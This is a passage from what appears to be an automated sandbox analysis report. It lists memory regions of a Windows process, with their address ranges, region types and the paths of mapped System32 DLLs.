"private_0x0000000002b20000" filename = "" Region: id = 915 start_va = 0x2c80000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 916 start_va = 0x2cd0000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 917 start_va = 0x2d10000 end_va = 0x2dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d10000" filename = "" Region: id = 918 start_va = 0x2dd0000 end_va = 0x2e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 919 start_va = 0x2e90000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 920 start_va = 0x2ea0000 end_va = 0x2f9ffff monitored = 
1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 921 start_va = 0x2fa0000 end_va = 0x309ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 922 start_va = 0x30a0000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 923 start_va = 0x31a0000 end_va = 0x329ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 924 start_va = 0x32a0000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032a0000" filename = "" Region: id = 925 start_va = 0x33a0000 end_va = 0x349ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 926 start_va = 0x34a0000 end_va = 0x449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 927 start_va = 0x44a0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044a0000" filename = "" Region: id = 928 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 929 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 930 start_va = 0x4580000 end_va = 0x45bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 931 start_va = 0x45e0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 932 start_va = 0x4620000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = 
private name = "private_0x0000000004620000" filename = "" Region: id = 933 start_va = 0x4960000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 934 start_va = 0x4ac0000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 935 start_va = 0x4b00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 936 start_va = 0x50d0000 end_va = 0x510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 937 start_va = 0x6a520000 end_va = 0x6a652fff monitored = 0 entry_point = 0x6a52145e region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 938 start_va = 0x6a930000 end_va = 0x6ab05fff monitored = 0 entry_point = 0x6a933e83 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 939 start_va = 0x6b120000 end_va = 0x6b12bfff monitored = 0 entry_point = 0x6b121160 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 940 start_va = 0x6b350000 end_va = 0x6b385fff monitored = 0 entry_point = 0x6b3515fa region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 941 start_va = 0x6bca0000 end_va = 0x6bca7fff monitored = 0 entry_point = 0x6bca31ff region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 942 start_va = 0x6bcc0000 end_va = 0x6bd51fff monitored = 0 entry_point = 
0x6bcc1696 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 943 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 944 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 945 start_va = 0x6e7e0000 end_va = 0x6e7e7fff monitored = 0 entry_point = 0x6e7e21fa region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 946 start_va = 0x6eb00000 end_va = 0x6eb59fff monitored = 0 entry_point = 0x6eb01f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 947 start_va = 0x6fbc0000 end_va = 0x6fd62fff monitored = 0 entry_point = 0x6fbde815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 948 start_va = 0x702f0000 end_va = 0x70304fff monitored = 0 entry_point = 0x702f12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 949 start_va = 0x70310000 end_va = 0x70361fff monitored = 0 entry_point = 0x703114be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 950 start_va = 0x70370000 end_va = 0x703d0fff monitored = 0 entry_point = 0x70373921 region_type = mapped_file name = "wer.dll" filename = 
"\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 951 start_va = 0x706a0000 end_va = 0x706edfff monitored = 0 entry_point = 0x706d816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 952 start_va = 0x70930000 end_va = 0x7093efff monitored = 0 entry_point = 0x70938816 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 953 start_va = 0x70980000 end_va = 0x70991fff monitored = 0 entry_point = 0x70988f80 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 954 start_va = 0x70a00000 end_va = 0x70a2ffff monitored = 0 entry_point = 0x70a0803f region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 955 start_va = 0x70ab0000 end_va = 0x70afcfff monitored = 0 entry_point = 0x70ab864b region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 956 start_va = 0x71c60000 end_va = 0x71caefff monitored = 0 entry_point = 0x71c61452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 957 start_va = 0x71cb0000 end_va = 0x71d07fff monitored = 0 entry_point = 0x71cb13b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 958 start_va = 0x71d10000 end_va = 0x71d24fff monitored = 0 entry_point = 0x71d111fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: 
"c:\\windows\\system32\\cabinet.dll") Region: id = 959 start_va = 0x71ff0000 end_va = 0x71ff8fff monitored = 0 entry_point = 0x71ff1830 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 960 start_va = 0x72000000 end_va = 0x720b9fff monitored = 0 entry_point = 0x720153ca region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 961 start_va = 0x724b0000 end_va = 0x724bafff monitored = 0 entry_point = 0x724b64d4 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 962 start_va = 0x724c0000 end_va = 0x724c7fff monitored = 0 entry_point = 0x724c3128 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 963 start_va = 0x724d0000 end_va = 0x724d6fff monitored = 0 entry_point = 0x724d1140 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 964 start_va = 0x724e0000 end_va = 0x72522fff monitored = 0 entry_point = 0x724e9dea region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 965 start_va = 0x72530000 end_va = 0x72581fff monitored = 0 entry_point = 0x725315e4 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 966 start_va = 0x72590000 end_va = 0x725a1fff monitored = 0 entry_point = 0x72593271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 967 start_va = 0x725b0000 
end_va = 0x725bcfff monitored = 0 entry_point = 0x725b2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 968 start_va = 0x725f0000 end_va = 0x72606fff monitored = 0 entry_point = 0x725fd006 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 969 start_va = 0x72630000 end_va = 0x7263cfff monitored = 0 entry_point = 0x72635f08 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 970 start_va = 0x72690000 end_va = 0x726c7fff monitored = 0 entry_point = 0x7269990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 971 start_va = 0x727c0000 end_va = 0x727c6fff monitored = 0 entry_point = 0x727c128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 972 start_va = 0x727d0000 end_va = 0x727ebfff monitored = 0 entry_point = 0x727da431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 973 start_va = 0x72800000 end_va = 0x72828fff monitored = 0 entry_point = 0x7280133a region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 974 start_va = 0x72e80000 end_va = 0x72ed0fff monitored = 0 entry_point = 0x72ea988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 975 start_va = 0x730d0000 end_va = 0x730e1fff monitored = 0 entry_point = 
0x730d2d29 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 976 start_va = 0x73210000 end_va = 0x73217fff monitored = 0 entry_point = 0x73212ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 977 start_va = 0x73250000 end_va = 0x7325cfff monitored = 0 entry_point = 0x7325689d region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 978 start_va = 0x73440000 end_va = 0x7349afff monitored = 0 entry_point = 0x7347e260 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 979 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 980 start_va = 0x734b0000 end_va = 0x73540fff monitored = 0 entry_point = 0x73525520 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 981 start_va = 0x73550000 end_va = 0x73555fff monitored = 0 entry_point = 0x735514b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 982 start_va = 0x73560000 end_va = 0x735a6fff monitored = 0 entry_point = 0x73595440 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 983 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 
region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 984 start_va = 0x735d0000 end_va = 0x73619fff monitored = 0 entry_point = 0x735d1851 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 985 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 986 start_va = 0x73630000 end_va = 0x73679fff monitored = 0 entry_point = 0x73663960 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 987 start_va = 0x73680000 end_va = 0x73770fff monitored = 0 entry_point = 0x73734cc0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 988 start_va = 0x73780000 end_va = 0x73795fff monitored = 0 entry_point = 0x73791409 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 989 start_va = 0x737a0000 end_va = 0x73806fff monitored = 0 entry_point = 0x737a7b26 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 990 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 991 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 
region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 992 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 993 start_va = 0x73920000 end_va = 0x73933fff monitored = 0 entry_point = 0x73921464 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 994 start_va = 0x73940000 end_va = 0x7397afff monitored = 0 entry_point = 0x73941350 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 995 start_va = 0x73980000 end_va = 0x7399afff monitored = 0 entry_point = 0x739813b0 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 996 start_va = 0x739a0000 end_va = 0x739cbfff monitored = 0 entry_point = 0x739a14a5 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 997 start_va = 0x739d0000 end_va = 0x73a01fff monitored = 0 entry_point = 0x739f0274 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 998 start_va = 0x73a10000 end_va = 0x73a42fff monitored = 0 entry_point = 0x73a11462 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 999 start_va = 0x73a50000 end_va = 0x73a5cfff monitored = 0 entry_point = 0x73a51326 region_type = mapped_file name = "rtutils.dll" 
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1000 start_va = 0x73a60000 end_va = 0x73adcfff monitored = 0 entry_point = 0x73a727c0 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1001 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1002 start_va = 0x73b60000 end_va = 0x73b6efff monitored = 0 entry_point = 0x73b64427 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1003 start_va = 0x73b70000 end_va = 0x73bb6fff monitored = 0 entry_point = 0x73b889f9 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1004 start_va = 0x73bc0000 end_va = 0x73bc9fff monitored = 0 entry_point = 0x73bc4d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1005 start_va = 0x73bd0000 end_va = 0x73bd8fff monitored = 0 entry_point = 0x73bd1229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1006 start_va = 0x73be0000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73be45c2 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1007 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: 
"c:\\windows\\system32\\atl.dll") Region: id = 1008 start_va = 0x73c10000 end_va = 0x73c3afff monitored = 0 entry_point = 0x73c17a69 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1009 start_va = 0x73c80000 end_va = 0x73c8ffff monitored = 0 entry_point = 0x73c838c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1010 start_va = 0x73c90000 end_va = 0x73d22fff monitored = 0 entry_point = 0x73c91595 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1011 start_va = 0x73e70000 end_va = 0x73e75fff monitored = 0 entry_point = 0x73e71150 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1012 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1013 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1014 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1015 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1016 start_va = 
0x73ff0000 end_va = 0x7401efff monitored = 0 entry_point = 0x7400c4c0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1017 start_va = 0x740d0000 end_va = 0x740dcfff monitored = 0 entry_point = 0x740d11e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1018 start_va = 0x740e0000 end_va = 0x740ecfff monitored = 0 entry_point = 0x740e1375 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1019 start_va = 0x741f0000 end_va = 0x7421efff monitored = 0 entry_point = 0x741f1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1020 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1021 start_va = 0x74870000 end_va = 0x748affff monitored = 0 entry_point = 0x7487a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1022 start_va = 0x748b0000 end_va = 0x748c1fff monitored = 0 entry_point = 0x748b4795 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1023 start_va = 0x74a10000 end_va = 0x74a16fff monitored = 0 entry_point = 0x74a110c0 region_type = mapped_file name = 
"avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1024 start_va = 0x74a20000 end_va = 0x74b14fff monitored = 0 entry_point = 0x74a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1025 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1026 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1027 start_va = 0x74d60000 end_va = 0x74dd5fff monitored = 0 entry_point = 0x74d6760e region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1028 start_va = 0x74de0000 end_va = 0x74de4fff monitored = 0 entry_point = 0x74de15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1029 start_va = 0x74e60000 end_va = 0x74e6afff monitored = 0 entry_point = 0x74e6129b region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1030 start_va = 0x74e90000 end_va = 0x74ea5fff monitored = 0 entry_point = 0x74e92061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1031 start_va = 0x74eb0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74eb1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" 
(normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1032 start_va = 0x74ed0000 end_va = 0x74ee4fff monitored = 0 entry_point = 0x74ed3dd9 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1033 start_va = 0x74f70000 end_va = 0x74f9bfff monitored = 0 entry_point = 0x74f7e9eb region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1034 start_va = 0x74fa0000 end_va = 0x74fa7fff monitored = 0 entry_point = 0x74fa34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1035 start_va = 0x75050000 end_va = 0x7505dfff monitored = 0 entry_point = 0x75051289 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1036 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1037 start_va = 0x75120000 end_va = 0x75141fff monitored = 0 entry_point = 0x751253e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1038 start_va = 0x75150000 end_va = 0x75193fff monitored = 0 entry_point = 0x751663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1039 start_va = 0x75280000 end_va = 0x75285fff monitored = 0 entry_point = 0x75281673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1040 start_va = 
